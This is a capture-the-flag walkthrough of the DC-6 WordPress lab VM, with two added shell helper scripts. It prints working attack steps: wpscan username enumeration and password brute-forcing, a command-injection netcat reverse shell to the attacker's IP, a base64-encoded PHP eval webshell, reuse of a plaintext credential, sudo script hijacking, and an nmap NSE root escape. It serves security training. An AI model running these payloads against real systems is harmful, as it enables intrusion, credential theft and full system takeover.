Knowledge points
- WordPress username enumeration
- WordPress password brute-forcing
- Command execution vulnerability
- sudo nmap privilege escalation (nmap runnable as root via sudo NOPASSWD, not a SUID bit)
nmap scan
Target IP: 192.168.0.141. Add "192.168.0.141 wordy" to /etc/hosts so the site resolves under its hostname; Wappalyzer then identifies it as WordPress.
wpscan
Enumerate usernames:
wpscan --url http://wordy/ --enumerate u
Result: five users, admin, graham, mark, sarah, jens. Every name is confirmed by "Login Error Messages", i.e. the login form itself discloses whether a username exists, which is what makes the password brute-force below practical.
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] graham
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] mark
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] sarah
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jens
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
Lab hint: rockyou.txt is the wordlist to use; it ships with Kali under /usr/share/wordlists/ (gzip-compressed on a fresh install, so gunzip it first). The full list is huge, so trim it down to a candidate subset before running wpscan.
Brute-force user passwords
wpscan --url http://wordy/ -U u.txt -P passwords.txt
(u.txt holds the five usernames found above, passwords.txt the candidate list taken from rockyou.txt)
[SUCCESS] - mark / helpdesk01
Command execution vulnerability
Reverse shell
Listener on the attacking machine (192.168.0.101):
nc -lvnp 8085
Payload injected into the vulnerable field, chained after a harmless value with ";":
127.0.0.1;nc 192.168.0.101 8085 -e /bin/bash
(-e needs a netcat build that supports it, which the target's did; otherwise fall back to a bash /dev/tcp or mkfifo-based reverse shell.)
Write a webshell
First attempt:
echo "<?php eval($_POST['a']);?>" > aa.php
What lands on disk is <?php eval(['a']);?>, with $_POST gone. This is not the application filtering anything: inside double quotes the shell treats $_POST as an (unset) variable and expands it to nothing. Single quotes would avoid that, but the most reliable route through an injection point is to base64-encode the payload and decode it on the target. Keep the trailing "=" padding; GNU base64 -d reports "invalid input" on an unpadded string:
echo "PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7Pz4=" | base64 -d > shell.php
shell.php now executes whatever PHP arrives in POST parameter a.
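The quoting pitfall above and the base64 workaround, as an added example that is not code from the original writeup. It assumes the injected string is executed by /bin/sh on the target, so shell quoting rules apply before anything reaches the file; the function names are illustrative.

```sh
#!/bin/sh
# Added example, not from the original writeup: why "$_POST" disappeared and
# how to get the webshell line onto disk intact. Assumption: the injected
# string is executed by /bin/sh on the target, so shell quoting is applied
# before anything reaches the file.

# The first attempt. Inside double quotes the shell expands $_POST as an
# (unset) variable, so what gets written is <?php eval(['a']);?>.
naive_payload() {
    echo "<?php eval($_POST['a']);?>"
}

# Single quotes stop parameter expansion. The PHP string uses double quotes
# here so the whole line can sit inside one pair of single quotes.
single_quoted_payload() {
    echo '<?php eval($_POST["a"]);?>'
}

# Base64 is the robust route through an injection point: no quotes, no $,
# no angle brackets in transit. The trailing "=" pad must be kept; GNU
# base64 -d reports "invalid input" on an unpadded string.
B64='PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7Pz4='
base64_payload() {
    printf '%s\n' "$B64" | base64 -d
}

# Build that base64 string from the plaintext so it can be regenerated for
# any other one-liner (printf '%s' avoids a trailing newline in the input).
encode_payload() {
    printf '%s' "<?php eval(\$_POST['a']);?>" | base64
}

# On the target the last step would be:
#   echo "$B64" | base64 -d > shell.php
# and then POST a=<php code> to shell.php.
```

Run the functions locally before sending anything: comparing naive_payload with base64_payload shows the lost $_POST immediately, which saves a round trip through the injection point.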
/home/mark/stuff/things-to-do.txt
Found while browsing the file system; this note in mark's home contains the graham user's password:
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
/home/jens/backups.sh (also found while browsing; it just tars the web root):
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
Try that password on the system account: ssh as graham with GSo7isUM1D4 (the credential from the note is reused for the OS login).
ssh graham@192.168.0.141
Login succeeds.
nmap privilege escalation
sudo -l
As graham, sudo -l points at the script found earlier, /home/jens/backups.sh, runnable as jens.
Running it as jens unchanged just creates the tarball and gives no shell, so nothing is escalated yet:
sudo -u jens /home/jens/backups.sh
Because graham may execute that file as jens, the file itself is the lever: check with ls -l whether graham can write to it, and if so make it spawn a shell (for example by appending a line that runs /bin/bash) before running it through sudo -u jens again, which lands in a shell as jens.
From that jens shell, sudo -l shows a different rule, nmap runnable as root:
Matching Defaults entries for jens on dc-6:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jens may run the following commands on dc-6:
(root) NOPASSWD: /usr/bin/nmap
Helper site, GTFOBins:
https://gtfobins.github.io/gtfobins/nmap/
Payload: the NSE script runs with nmap's privileges, so nmap has to be started as root through sudo (sudo -u root is the same as plain sudo here) for the resulting /bin/sh to be root. Quote $TF in case mktemp returns a path with spaces:
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > "$TF"
sudo -u root nmap --script="$TF"
Confirm with id. Input echo is disabled in this shell, so typed commands do not show but still run. Very old nmap builds (2.02 to 5.21) without --script use sudo nmap --interactive followed by !sh instead, per GTFOBins.
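Spotting the nmap rule in sudo -l output is the whole escalation here, so a small triage helper is worth having. The script below is an added example and not code from the original writeup: it pulls every NOPASSWD rule out of a captured sudo -l transcript and flags binaries that GTFOBins documents with a sudo shell escape. SUDO_L_SAMPLE is constructed from the jens output above plus two made-up rules (tar without NOPASSWD, a comma-separated less/ls rule) to show the filtering; GTFO_SUDO is a hand-picked subset of GTFOBins, not the full list.

```sh
#!/bin/sh
# Added example, not from the original writeup: triage a captured "sudo -l"
# transcript for NOPASSWD rules and flag binaries that GTFOBins lists with
# a sudo shell escape. SUDO_L_SAMPLE is constructed: the nmap rule is the
# real one from the writeup, the tar and less/ls rules are made up to show
# that password-protected rules are skipped and comma lists are split.

SUDO_L_SAMPLE='Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap
    (root) /usr/bin/tar
    (www-data) NOPASSWD: /usr/bin/less, /bin/ls'

# Hand-picked subset of binaries GTFOBins documents with a "sudo" escape.
GTFO_SUDO='nmap vim vi find less more awk python python3 perl tar env bash sh'

# Emit "runas|command" for every NOPASSWD rule in sudo -l output on stdin.
# Handles "(user)" and "(user : group)" run-as specs and comma-separated
# command lists; arguments after the command path are dropped.
nopasswd_rules() {
    awk '/NOPASSWD:/ {
        runas = $0; sub(/^[ \t]*\(/, "", runas); sub(/\).*/, "", runas)
        list = $0;  sub(/.*NOPASSWD:[ \t]*/, "", list)
        n = split(list, cmds, /,[ \t]*/)
        for (i = 1; i <= n; i++) { c = cmds[i]; sub(/[ \t].*/, "", c); print runas "|" c }
    }'
}

# Read "runas|command" lines and keep those whose basename is on GTFO_SUDO,
# printing the matching GTFOBins page next to each hit.
flag_escapes() {
    while IFS='|' read -r runas cmd; do
        base=${cmd##*/}
        for g in $GTFO_SUDO; do
            if [ "$base" = "$g" ]; then
                echo "$runas $cmd https://gtfobins.github.io/gtfobins/$base/"
                break
            fi
        done
    done
}

# Full triage over the constructed sample. Live use on a target:
#   sudo -l | nopasswd_rules | flag_escapes
triage_sample() {
    printf '%s\n' "$SUDO_L_SAMPLE" | nopasswd_rules | flag_escapes
}
```

Rules that still require a password are deliberately left out; they are only useful once the user's own password is known, which is a different situation from the jens shell above.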